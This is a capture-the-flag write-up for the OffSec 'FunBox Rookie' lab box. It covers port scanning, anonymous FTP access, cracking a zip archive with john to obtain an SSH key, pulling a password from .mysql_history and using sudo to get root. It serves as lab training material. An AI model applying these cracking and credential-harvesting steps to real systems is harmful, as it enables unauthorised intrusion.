Skip to main content

FunBox Rookie

This is my write ups for FunboxEasyEnum (See original submission) on Off-Sec Proving Ground.

This room is a CTF type of room

I will try to go deep into the technical thing we do in this room.

1. Enum

  • Lets start up the box and get the IP

Getting the IP

  • Export the IP to the terminal so we can use it easier
export IP=192.168.118.107

## Test to see if the IP is correct
echo $IP
  • Start the port scan
Port Scan
## Create a directory to store the scan results
mkdir nmap

## Start a default nmap scan
nmap -sC -sV -vvv -oN nmap/default_scan $IP

## Start a rustscan for faster all port scan
rustscan -a $IP -- -oN nmap/rustscan $IP
Rustscan result
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

  • The target is running a website, we can visit it to see the default page.

  • Visit /robots.txt to see if the website trying to hide any directory

curl http://$IP/robots.txt
Disallow: /logs/
  • But that was a dead end. Since the target using ftp, we can try login as anonymous to see if it work
FTP anonymous login
ftp -p $IP
Connected to 192.168.118.107.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.118.107]
Name (192.168.118.107:minhnq): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.49.118 !
230-
230-The local time is: Thu Dec 02 04:04:34 2021
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.

## Listing the files
ftp> ls
227 Entering Passive Mode (192,168,118,107,159,75).
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 anna.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 ariel.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 bud.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 cathrine.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 homer.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 jessica.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 john.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 marge.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 miriam.zip
-r--r--r--   1 ftp      ftp          1477 Jul 25  2020 tom.zip
-rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 zlatan.zip
226 Transfer complete

## Getting all the files
ftp> mget * .

  • We can use john or in this case using zip2john to crack all the files and see information they will give us

  • Eventually when cracking tom.zip we will find something usefull for us

zip2john tom.zip > tom.hash

john --wordlist=/usr/share/wordlists/rockyou.txt tom.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire           (tom.zip/id_rsa)
1g 0:00:00:00 DONE (2021-10-26 17:34) 100.0g/s 70400p/s 70400c/s 70400C/s sunshine1..nichole
Use the "--show" option to display all of the cracked passwords reliably
Session completed
  • With the passphrase we just found unzip tom.zip to get id_rsa

2. Foothold

  • SSH login as user tom
ssh -i id_rsa tom@$IP -t 'bash --noprofile'

3. PrivEsc

  • Looking around in tom home
tom@funbox2:~$ ls -la
total 40
drwxr-xr-x 5 tom  tom  4096 Dec  2 04:11 .
drwxr-xr-x 3 root root 4096 Jul 25  2020 ..
-rw------- 1 tom  tom     0 Oct 14  2020 .bash_history
-rw-r--r-- 1 tom  tom   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 tom  tom  3771 Apr  4  2018 .bashrc
drwx------ 2 tom  tom  4096 Dec  2 04:11 .cache
drwx------ 3 tom  tom  4096 Jul 25  2020 .gnupg
-rw-r--r-- 1 tom  tom    33 Dec  2 03:55 local.txt
-rw------- 1 tom  tom   295 Jul 25  2020 .mysql_history
-rw-r--r-- 1 tom  tom   807 Apr  4  2018 .profile
drwx------ 2 tom  tom  4096 Jul 25  2020 .ssh
  • The file .mysql_history look interesting
tom@funbox2:~$ cat .mysql_history 
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
  • We can see that tom password is xx11yy22!
tom@funbox2:~$ sudo -l
[sudo] password for tom: 
Matching Defaults entries for tom on funbox2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tom may run the following commands on funbox2:
    (ALL : ALL) ALL
  • Become root and get the flags
Getting the flags
sudo -s

cat /home/tom/local.txt /root/proof.txt
[REDACTED]
[REDACTED]
Last updated on